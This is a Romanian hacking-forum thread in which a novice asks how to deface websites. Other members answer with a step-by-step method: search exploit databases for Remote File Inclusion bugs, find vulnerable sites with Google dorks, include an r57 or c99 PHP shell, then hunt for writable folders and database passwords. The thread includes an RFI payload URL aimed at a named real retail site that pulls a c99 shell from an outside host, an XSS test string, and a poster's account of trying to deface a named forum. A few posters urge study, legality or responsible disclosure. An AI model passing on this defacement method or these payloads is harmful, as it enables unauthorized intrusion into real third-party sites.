Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Care se pricepe sa sparga un site sau un forum si este darnic de a impartasi metoda pe scurt macar , sa ne spuna si noua,sau sa ne dea un tutorial ,un clip video sau chiar un program !!!!!!! Multumesc !!!!
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Intri pe forum si cauti butonul "Deface"
Come on, dude ! Tu crezi ca e o chestie care se poate face asa cum ai bate din palme ? Hacking inseamna cercetare. Apuca-te sa inveti si apoi ia site-ul si verifica-l daca e vulnerabil la toate tehnicile care le stii. Daca nu e, cauta derivatii ale tehnicilor care le stii. Daca nu e nici asa, cauta alte site-uri pe acelasi server sau alte servicii vulnerabile pe server.
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
[ OSHO ] IMI POTI DA SI MIE CLIPUL VIDEO DE A FOST DAT IN SUBIECTUL DE DEASUPRA SUBIECTULUI MEU KARE ARE NUMELE " Cum sa spargi un forum ... "sau un alt clip video dar cu acelasi subiect !!!!!!
Modificat de Maniak (acum 16 ani)
pus acum 16 ani
OldNavy
Elite Member Din: Toplita
Inregistrat: acum 17 ani
Postari: 555
Maniak a scris:
[ OSHO ] IMI POTI DA SI MIE CLIPUL VIDEO DE A FOST DAT IN SUBIECTUL DE DEASUPRA SUBIECTULUI MEU KARE ARE NUMELE " Cum sa spargi un forum ... "sau un alt clip video dar cu acelasi subiect !!!!!!
Mi se pare ca era metoda aia pentru forumurile phpbb (versiunile vechi) Nu iti fa sperante ca la astea noi nu merge.Mai bine te-ai apuca de invatat!
_______________________________________ to see a world in a grain of sand, and heaven in a wild flower, to hold infinity in the palm of your hand and eternity in an hour.
pus acum 16 ani
the*O.n.E*AnaKonD
Little Kevin Inregistrat: acum 17 ani
Postari: 90
Maniak ia si invata PHP + MySQL (pentru inceput) si apoi ia'ti r57shell.Cauti o pagina vulnerabila,incluzi shellu' dupa care umbli prin server dupa baze de date si cauti acolo parole,date importante ce vrei tu.Dar pentru asta citeste prima mea propozitie si treci la treaba.Ce vrei tu necesita munca
PS: acum nici nu mai gasesti acea vulnerabilitate prin forumurile phpbb aproape toate si'au pus patch'ul
Modificat de the*O.n.E*AnaKonD (acum 16 ani)
pus acum 16 ani
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
PHP + MySQL le stiu ,stiu si kum sa caut o pagina vulnerabila (cu Acunetix Web Vulnerability Scanner ) dar nu stiu de unde sa iau r57shell si cum sa includ shellu' !!!!!!asta nu stiu eu !!!
pus acum 16 ani
hfhun
Elite Member
Inregistrat: acum 17 ani
Postari: 593
NU mai folositi acunetix ! Raman gramezi de loguri pe server! Am postat si eu ceva in legatura cu asta, aici
Poate aveti noroc si nu se uita mereu adminul prin loguri. Dar daca faceti deface etc sigur se va uita, si va prinde imediat
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Alte metode pentru defacerea unui site nu cunuasteti decat cu r57shell ??? Dka da explicatine si noua fie si pe scurt !!!!
pus acum 16 ani
hackcrack
Little Kevin Inregistrat: acum 16 ani
Postari: 98
hfhun a scris:
NU mai folositi acunetix ! Raman gramezi de loguri pe server! Am postat si eu ceva in legatura cu asta, aici
Poate aveti noroc si nu se uita mereu adminul prin loguri. Dar daca faceti deface etc sigur se va uita, si va prinde imediat
Vreau sa te intreb si eu ceva hfhun, atunci ce alt program sa foosesc care sa fie la fel de bun ca acunetix, eu cred ca daca ai de gand sa faci un deface il poti scana cu acunetix pentru ca poti sterge logul. Sau am putea sa punem un proxy ca fim anonim. Salutare
_______________________________________
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
hackcrack: iti dau eu raspunsul: nici un program. Toate programele de genul asta iti pot cauza o gramada de probleme pentru ca scanarea se face intr-un mod necontrolat. Pe langa asta chiar de s-ar face intr-un mod bine determinat de utilizator, ar fi foarte lame. Hack inseamna sa gandesti, nu sa spargi.
Trecand peste asta, cum poti sterge logurile daca ai reusit sa faci deface ? Nu stiu de ce am impresia ca tu habar n-ai ce inseamna un atac web. Odata ce ai reusit sa "spargi" un site ai acces la tot ce are userul respectiv. Atat. Log-urile nu prea ai cum sa le stergi oricat te-ai chinui pentru ca alea nu apartin utilizatorului.
Si ca sa lamurim si problema cu proxy... da, ar fi o solutie... dar scanatul tot treaba de lameri ramane si riscurile tot exista. Un admin cu picioarele pe pamant tot te poate prinde chiar daca ai proxy. Trebuie doar sa stea si sa urmareasca ce faci ca sa stie de unde esti si cum poate ajunge la tine.
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Mah chiar nu mai cunoaste nimeni alta metoda de defacere sa mi-o spuna si mie sau sa intre pe id meu de messenger
Modificat de Maniak (acum 16 ani)
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Maniak a scris:
Mah chiar nu mai cunoaste nimeni alta metodade defacere sa mi-o spuna si mie sau sa intre pe id meu de messenger
Daca iti mai pui ID-ul pe forum ai ban permanent de la mine (stiu ca nu e sectiunea mea). Discutiile se poarta pe forum. Pentru orice altceva sunt site-uri de matrimoniale.
Si tu ce metoda vrei ? Vrei sa urmezi o procedura standard ? Lasa-te de meserie. Daca nu esti dispus sa iti pui capul la contributie nu e de tine hackingul. Apuca-te de crescut oi. Pentru aia se poate face cate o procedura standard pentru fiecare operatie in parte. Cand o sa fi destul de deschis la minte sa intelegi ca hackingul necesita studiu hai inapoi si poate te ajuta careva.
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
OSHO - Cu tine nu invata omul prea multe,sau cel putin asta e parerea mea ,treaba e ,ka eu ceream un program ,pt ka am vazut pe cum spargeau site cu programe !!! ex: Hackers Toolbox 2.0 iar clipul este aici
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Maniak a scris:
OSHO - Cu tine nu invata omul prea multe,sau cel putin asta e parerea mea
Aici gresesti, sau cel putin asta e parerea mea. Eu intotdeauna is dispus sa ajut omul sa invete. Dar niciodata nu o sa ajut pe nimeni sa faca ceva daca nu intelege ce face. Dupa posturile tale dai de inteles ca tu vrei sa faci, nu sa inveti si sa intelegi ce se intampla. So... I'm useless
Oricum, nu-i stres. O sa vina altii care sa te invete cum se aplica cate o tehnica fara sa-i intereseze daca intelegi ceva sau nu.
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
OSHO ,dar de ce nu imi zici u cum sa defac un site sau un forum ,ka nu ai de unde sa sti daka inteleg sau nu !!!!!!!!Daka zici ca tu ajuti onmul explica-i ,ca nu ai deunde sa sti daca intelege sau nu !!!In cazul meu explica-mi si ai sa vezi ka inteleg !!! PLZZZ !!!
Modificat de Maniak (acum 16 ani)
pus acum 16 ani
hfhun
Elite Member
Inregistrat: acum 17 ani
Postari: 593
Maniak, daca vrei sa inveti cu adevarat citeste forumul, si vei afla ca nu exista o metoda prin care se sparge orice site. Tu vrei sa ai un program cu care sa faci toata treaba, nu vrei sa intelegi cum se face. Daca ar exista acel program magic, ce rost ar mai avea sa iti faci un site? Cand stii ca oricine il poate sparge?
Daca vrei sa fii mai sus de nivelul unui lamer, invata cat de mult poti, nu cere sa ti se dea " mura-n gura " ca nu rezolvi nimic asa.
@Maniak:El incearca sa te faca sa judeci , sa stii ce ti-ar trebuii pentru deface , cunosinte web si programare ( ptr.exploti ) . Acum , nici eu nu prea stiu ce miar trebuii pentru deface si vreau sal practic . Ce stiu e ca ti-ar trebuii limbajele webului la perfectie ( php , mysql , js , html , xhtml ) si apoi un limbaj de programare pentru exploiti , de ex C . Bafta !
Acum ca sa nu mai intrebi , ca sa le inveti cel mai bine e te duci la librarie / biblioteca siti iei carti , lasale pe cele de pe PC
pus acum 16 ani
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Cu C99Shell se pot sparge unele siteuri ???
pus acum 16 ani
Sketch
Pe lista neagra... Inregistrat: acum 17 ani
Postari: 96
edited.
Modificat de Sketch (acum 1 an)
pus acum 16 ani
streptococ
Master of 127.0.0.1 Inregistrat: acum 17 ani
Postari: 158
Ce dreq il puneti sa invete o gramada de limbaje de programare si de scripting cand el nu intelege cateva tehnici simple dar un limbaj. + pentru a face un deface nu iti trebuie absolut deloc cunostinte PHP iar mysql ..tu Sketch ai idee despre mysql ? iti spun eu nu ai nici o idee daca aveai nu ziceai ca tre sa stii mysql pentru a face un deface. Pentru a face un deface poti sa ai si un IQ de 0,1.Tre doar sa stii 2 coduri html pentru deface si sa dai pe google dupa dork or sa scanezi cu scanner buguri RFI. Mai citii mai sus unul de zicea de php,mysql,js,C,perl etc. o sumedenie de limbaje de programare si scripting pe care nu le-ar invata nici in 2 luni.Rakon tu ai inteles vreodata in viata ta un exploit ?
Maniak uite cum sta treaba pe intelesul tau.
1. cauta un bug [ sa fie Remote File Inclusion ] pe un site de securitate gen milw0rm,securityfocus,secunia etc. 2.vezi daca bugul are google dork daca nu ia numele softului afectat si versiunea si cauta pe google. 3.ai gasit cu google un soft cu versiunea afectata , acum e timpul sa incluzi php shellu in site`u vuln 4. ai obtinut acces la server 5. cauta unde ai drepturi de scriere si gata
unde e PHP`ul,MYSQL`u,C,Perl si toate cele ca sa penetrezi serveru` ?
Modificat de streptococ (acum 16 ani)
_______________________________________ Retired !
pus acum 16 ani
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Am downloadat C99Shell care contine un fisier pe nume CSH.B64 care are 2,19MB,dar problema e cum se instaleaza !!!Care ma ajuta in privinta asta !
pus acum 16 ani
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Multumesc mult streptococ esti singurul om pe care il intelesei !
pus acum 16 ani
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Mai exista o problema !!Acum de unde iau C99Shell care sa mearga si care sa nu fie text ci sa fie cam ca aici
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
@streptococ: asta e gluma sau tu chiar esti serios ?
Come on, chestiile astea is char lame de tot. Daca site-ul nu e vulnerabil RFI ce ai facut ? Te opresti ? Atat ? Te dai batut daca nu e vulnerabil la RFI ? Daca nu e vulnerabil la RFI inseamna ca ai gasit un site hack-proof ?
Scuza-ma ca imi permit sa ma amuz pe seama ta dar te credeam mult mai "greu" in gandire.
@Maniak: uite, ai vazut ca a venit unul care sa-ti dea mura-n gura ?
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Acum de unde iau C99Shell care sa mearga si care sa nu fie text ci sa fie cam ca aici Cu asta ma ajuta cineva ????? OSHO - u chiar te pricepi ,te rog ajutama cu chesti asta !!!sau altcineva care se pricepe !!!!
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
streptococ
Master of 127.0.0.1 Inregistrat: acum 17 ani
Postari: 158
OSHO a scris:
@streptococ: asta e gluma sau tu chiar esti serios ?
Come on, chestiile astea is char lame de tot. Daca site-ul nu e vulnerabil RFI ce ai facut ? Te opresti ? Atat ? Te dai batut daca nu e vulnerabil la RFI ? Daca nu e vulnerabil la RFI inseamna ca ai gasit un site hack-proof ?
Scuza-ma ca imi permit sa ma amuz pe seama ta dar te credeam mult mai "greu" in gandire.
@Maniak: uite, ai vazut ca a venit unul care sa-ti dea mura-n gura ?
lol OSHO,eu i-am vorbit mai jos decat unui incepator dupa ce am vazut ca nu e in stare nici sa gaseasca un php shell si i am recomandat cea mai usoara metoda si cea mai folosita de toti lamerii , am incercat sa il fac sa intelega nu cum fac majoritatea ii insira 10 limbaje de programare si "go". Crezi ca mai intelegea ceva daca ii insiram 10 metode ? Nu inteleg de ce te-ai amuzat ? probabil crezi ca doar atat stiu , sa folosesc un RFI.
Modificat de streptococ (acum 16 ani)
_______________________________________ Retired !
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
streptococ a scris:
Crezi ca mai intelegea ceva daca ii insiram 10 metode ? Nu inteleg de ce te-ai amuzat ? probabil crezi ca doar atat stiu , sa folosesc un RFI.
Dude, nu o lua ca o ofensa. A fost doar o gluma. Citeste inca o data ce ai postat si incearca sa-ti dai seama ce intelege altul
Anyway, nu ma intelege gresit. Nu am incercat sa te subestimez sau sa insinuez ca nu ai stii altceva... doar ca mi s-a parut al naibi de amuzanta treaba la modul in care ai pus problema... parca si vedeam un slogan: "Vrei sa fi hacker ? G00gl3 d0rkz + RFI r00lz !"
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
OSH acum intelesei ce trebuia sa fac ex : LINCK SITE VURNERABIL: /components/com_facileforms/facileforms.frame.php?ff_compath=
GOOGLE DORK: inurl"com_facileforms"
Shall :
Cam asta trebe sa arata sitele cu toate chestiile astea EX :www.flanco.ro/components/com_facileforms/facileforms.frame.php?ff_compath=http://popesculescu.lx.ro/c99.txt?
Dar cum mai gasesc alt linc de sit vurnerabil
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Maniak a scris:
Dar cum mai gasesc alt linc de sit vurnerabil
Poti folosi o tehnica folosita de lameri, adica google dorks. Asta se foloseste cand vrei sa demonstrezi ca esti lamer. Intri pe google si ii dai sa caute (asta e doar un exemplu): inurl:php?page=
Daca nu vrei sa fi lamer faci cateva teste sa vezi ca ai prins ideea si apoi pastrezi tehnica pentru cazul in care gasesti vreun site pe care vrei sa intri si care vezi ca e vulnerabil la RFI. Cea mai simpla metoda sa iti dai seama daca e vulnerabil la RFI e sa te uiti in URL. Daca vezi un nume de fisier in URL poti incerca sa incluzi C99 pentru ca e posibil sa fie RFI. Alte metode de RFI o sa gasesti mai incolo... sa dai fisierele de incarcare prin POST sau prin COOKIE. Alea is chestii pentru care trebuie sa mai inveti putin (nu mult) ca sa le poti aplica si trebuie sa inveti destul de mult ca sa stii sa le gasesti.
Ce dreq il puneti sa invete o gramada de limbaje de programare si de scripting cand el nu intelege cateva tehnici simple dar un limbaj. + pentru a face un deface nu iti trebuie absolut deloc cunostinte PHP iar mysql ..tu Sketch ai idee despre mysql ? iti spun eu nu ai nici o idee daca aveai nu ziceai ca tre sa stii mysql pentru a face un deface. Pentru a face un deface poti sa ai si un IQ de 0,1.Tre doar sa stii 2 coduri html pentru deface si sa dai pe google dupa dork or sa scanezi cu scanner buguri RFI. Mai citii mai sus unul de zicea de php,mysql,js,C,perl etc. o sumedenie de limbaje de programare si scripting pe care nu le-ar invata nici in 2 luni.Rakon tu ai inteles vreodata in viata ta un exploit ?
Maniak uite cum sta treaba pe intelesul tau.
1. cauta un bug [ sa fie Remote File Inclusion ] pe un site de securitate gen milw0rm,securityfocus,secunia etc. 2.vezi daca bugul are google dork daca nu ia numele softului afectat si versiunea si cauta pe google. 3.ai gasit cu google un soft cu versiunea afectata , acum e timpul sa incluzi php shellu in site`u vuln 4. ai obtinut acces la server 5. cauta unde ai drepturi de scriere si gata
unde e PHP`ul,MYSQL`u,C,Perl si toate cele ca sa penetrezi serveru` ?
Daca am inteles vreodata un exploit ? Da , am inteles . Dar uite , gasesti o vulnerabilitate in , si nu exista exploit momentan pentru aceasta vulnerabilitate , atunci trebuie sa-ti faci tu propriul exploit , de aia spuneam de un limbaj de programare ( gen C ) . Asa , si cu limbajele de web , deoarece trebuie sa stii sa te si uiti prin codul sursa , sal intelegi , sa iti bagi nasul prin baza de date .
Calm dude
Modificat de rakon (acum 16 ani)
pus acum 16 ani
streptococ
Master of 127.0.0.1 Inregistrat: acum 17 ani
Postari: 158
rakon stii ca exploiturile se scriu pe baza unor buguri, pentru ce iti trebuie sa codezi/folosesti exploit cand poti folosii bugul si fara ?
Dar uite , gasesti o vulnerabilitate in , si nu exista exploit momentan pentru aceasta vulnerabilitate , atunci trebuie sa-ti faci tu propriul exploit
Habar n-ai ce e ala un exploit si cu ce se mananca ! Daca gasesti o vulnerabilitate te folosesti de ea si iti ridici nivelul de drepturi nu te apuci sa cauti/faci un exploit .Exploiturile sunt pentru cei grei de cap care nu inteleg cum sa exploatez o vulnerabilitate si prefera exploiturile ca sunt usor de folosit unde doar le executa,introduc url`ul la site-ul vuln si apoi pot executa comenzi doar din consola. Nu zic ca exploiturile nu sunt folositoare,uneori chiar sunt necesare de exemplu pot executa aceeasi comanda de 999 ori [ adica repetata ] DAR nu cum crezi tu ca totul se rezulta la exploituri Pe scurt: Daca stii sa folosesti un bug nu ai nevoie de exploit ! ! !
deoarece trebuie sa stii sa te si uiti prin codul sursa , sal intelegi , sa iti bagi nasul prin baza de date .
tipule lasa-te ca nu e de tine, daca taceai filozof ramaneai ! la paginile codate in PHP nu ai cum sa vezi codul sursa ! iar la celelalte nu prea te ar interesa codul + daca webmasterul a folosit si un encoder gen Zend te poti uita la codul sursa ca la stele si nu vei intelege nimic
PS:
OSHO a scris:
"Vrei sa fi hacker ? G00gl3 d0rkz + RFI r00lz !"
ala nu ii hacker , ci doar un amarat de lamer/defacer care polueaza internetul.
Modificat de streptococ (acum 16 ani)
_______________________________________ Retired !
pus acum 16 ani
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Alta tehnica de spart site ,in cazul ka sitele nu e vulnerabil RFT mai exista !?? Si cum se face ???? Ca tahnica asta cu RTF am prinso !!!!!
pus acum 16 ani
the*O.n.E*AnaKonD
Little Kevin Inregistrat: acum 17 ani
Postari: 90
Maniak a scris:
Alta tehnica de spart site ,in cazul ka sitele nu e vulnerabil RFT mai exista !?? Si cum se face ???? Ca tahnica asta cu RTF am prinso !!!!!
RFT?? E clar ca ai inteles'o Ps: citeste ce a scris OSHO mai sus
OSHO a scris:
sa dai fisierele de incarcare prin POST sau prin COOKIE. Alea is chestii pentru care trebuie sa mai inveti putin (nu mult) ca sa le poti aplica si trebuie sa inveti destul de mult ca sa stii sa le gasesti.
Modificat de the*O.n.E*AnaKonD (acum 16 ani)
pus acum 16 ani
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Mah poi cum mai gasesc si eu un bug care sa fie Remote File Inclusion cu tot cu google dork cu care sa sparg site ???
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Maniak a scris:
Mah poi cum mai gasesc si eu un bug care sa fie Remote File Inclusion cu tot cu google dork cu care sa sparg site ???
Ai citit ce ti-am spus mai sus ? Adica eu iti spun ce ai de facut si apoi ma intrebi ce ai de facut... crezi ca o sa te mai ajute cineva daca vede ca nu citesti ce ti se spune ?
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Merci mult OSHO chiar o sa invat ce mi-ai dat pentru ca ma descurc cu engleza !!!Dar mai am o nelamurire (ultima nelamurire ) pe care ai incercat tu mai sus sa imi explici dar nu am inteles : cum gasec un linc cu site vulnerabil, da si mie un exemplu de linck ca sa pot si eu sa gasesc !!!!!
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Maniak a scris:
Merci mult OSHO chiar o sa invat ce mi-ai dat pentru ca ma descurc cu engleza !!!
That's good
Oricand ai nelamuriri legate de programare, intreaba. C-ul meu e cam ruginit ca nu l-am folosit de mult dar cred ca pot face fata intrebarilor
Maniak a scris:
cum gasec un linc cu site vulnerabil, da si mie un exemplu de linck ca sa pot si eu sa gasesc !!!!!
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Buguri care sa fie Remote File Inclusion pentru a le sparge cu Shell se gasesc pentru orice site ???? Si pentru " Bulletin® Version 3.6.4 " siteul este
pus acum 16 ani
hackcrack
Little Kevin Inregistrat: acum 16 ani
Postari: 98
OSHO --> revin din nou cu problema mea cu scanatul. Am inteles de la tine ca nici un soft nu ar fi recomandat pentru scanat pentru ca lasa urme foarte mari in log, pana aici este clar. Intrebare mea este ce metoda sa folosesc ca sa vad ce vulnerabiitati are ??
_______________________________________
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Well... dupa ce ai invatat bine metodele iti folosesti ochii :P
Cand vezi intr-un site ca toate URL-urile au forma index.php?pagina=contact.html nu iti mai trebuie nici un fel de program ca sa iti dai seama ca siteul ala (in majoritatea cazurilor) e vulnerabil RFI sau LFI. De asemenea, unde vezi un camp input care urmeaza sa fie prelucrat de server si rezultatul il vezi pe pagina urmatoare e destul sa adaugi acolo <script>alert('Bau bau !');</script> ca sa iti dai seama daca siteul e vulnerabil XSS sau nu. Exemple mai sunt, dar cred ca ai prins ideea
streptococ
Master of 127.0.0.1 Inregistrat: acum 17 ani
Postari: 158
OSHO a scris:
streptococ a scris:
mai exista posibilitatea ca , codul sa fie vuln la RFI dar totusi sa nu poti face nimic daca url fopen e setat 0ff in php.ini
Adica e LFI
exact , asa imi aduc aminte cum am gasit un LFI intr-un server edu.ro care de fapt era RFI dar are allow url fopen off
_______________________________________ Retired !
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Si alea is bune, mai ales la site-urile care isi pastreaza datele in fisiere cu extensii nasoale dpdv al securitatii ( .inc, .txt, .cfg ) si care sunt afisate de browser ca text plan
streptococ
Master of 127.0.0.1 Inregistrat: acum 17 ani
Postari: 158
da , majoritatea scripturilor php isi salveaza in config.php datele de conectare la baza de date dar pacat ca browserul nu poate afisa codul php ca plain text. Urasc LFI/RFI-urile in care sunt definite directoarele in open basedir :X
Modificat de streptococ (acum 16 ani)
_______________________________________ Retired !
pus acum 16 ani
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Oameni buni am incercat sa defac si eu un site phpBB cu exploturi si cu shell si tot nu am reusit www.cstrike.myforum.ro !!!Cauza e pentru ca nu gasesc explotul potrivit pentru el !!!
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Nici nu o sa gasesti. Orienteaza-te spre chestii mai simple. Daca vrei sa inveti, fa-ti un server web acasa pe sistemul care il folosesti acum si incearca acolo exploiturile.
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Poi cum merge sa il testez si la mine in computer ,fara sa il pun pe vreun domeniu web ????Eu am un site la mine in computer si il am si pe domeniu ,ia vezi as putea sa il defac pe cel in computer ???
pus acum 16 ani
streptococ
Master of 127.0.0.1 Inregistrat: acum 17 ani
Postari: 158
fara deface :p , le testezi simplu , pe localhost iti instalezi apache+php+mysql [ cauata EasyPHP ] iar site-ul ala nu cred ca il ai gazduit la tine in PC daca da atunci ii poti face deface
PS: scoate draq manelele de pe site-ul ala de muzica !
_______________________________________ Retired !
pus acum 16 ani
Maniak
Junior+ Inregistrat: acum 16 ani
Postari: 39
Mah daca sparg un site pot as intru si la inchisoare ,daca ma prinde ???
pus acum 16 ani
rakon
Pe lista neagra
Inregistrat: acum 17 ani
Postari: 261
Depinde ce site , daca spargi pagina fbi-ului , raspunsul este da !
pus acum 16 ani
OSHO
Elite Member Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069
Nu conteaza de site. ORICE site ai sparge exista riscul sa ajungi la inchisoare pana la 15 ani sau mai mult daca ti-ai bagat degetele si dincolo de granitele tarii.
Importante sunt sansele. Pentru un site mic nu prea sunt sanse sa faci inchisoare. De fapt in majoritatea cazurilor daca te prinde te alegi cu coaste rupte si chestii din astea, in nici un caz nu ajungi la tribunal pentru ca nimeni nu vrea sa se complice. Ajungi la tribunal doar daca s-a nimerit sa hackeresti o firma mare care are o gasca de juristi in spate si care e pornita pe scandal.
hackcrack
Little Kevin Inregistrat: acum 16 ani
Postari: 98
cred ca cel mia bine ar fi baieti sa stai linistit in banca voastra, si sa va lasati de sportul asta. Exista si alceva mai bun de facut. Salutare
_______________________________________
pus acum 16 ani
Parazitu_2009
Grand Master Inregistrat: acum 17 ani
Postari: 305
hackcrack a scris:
cred ca cel mia bine ar fi baieti sa stai linistit in banca voastra, si sa va lasati de sportul asta. Exista si alceva mai bun de facut. Salutare
Pai si atunci ce mai cauti pe forumul asta?
_______________________________________ Omul care nu are nimic de pierdut e cel mai greu de invins.
pus acum 16 ani
tw8
Elite Member
Din: Drobeta Turnu Severin
Inregistrat: acum 17 ani
Postari: 1087
Parazitu_2009 a scris:
Pai si atunci ce mai cauti pe forumul asta?
Probabil ca omul a vrut sa spuna sa se lase de deface . Dupa parerea mea, deface = lame. Mi se pare mai corect ca atunci cand gasesti o vulnerabilitate, sa atentionezi webmasteru-ul despre ea si, eventual, si cum o poate rezolva.
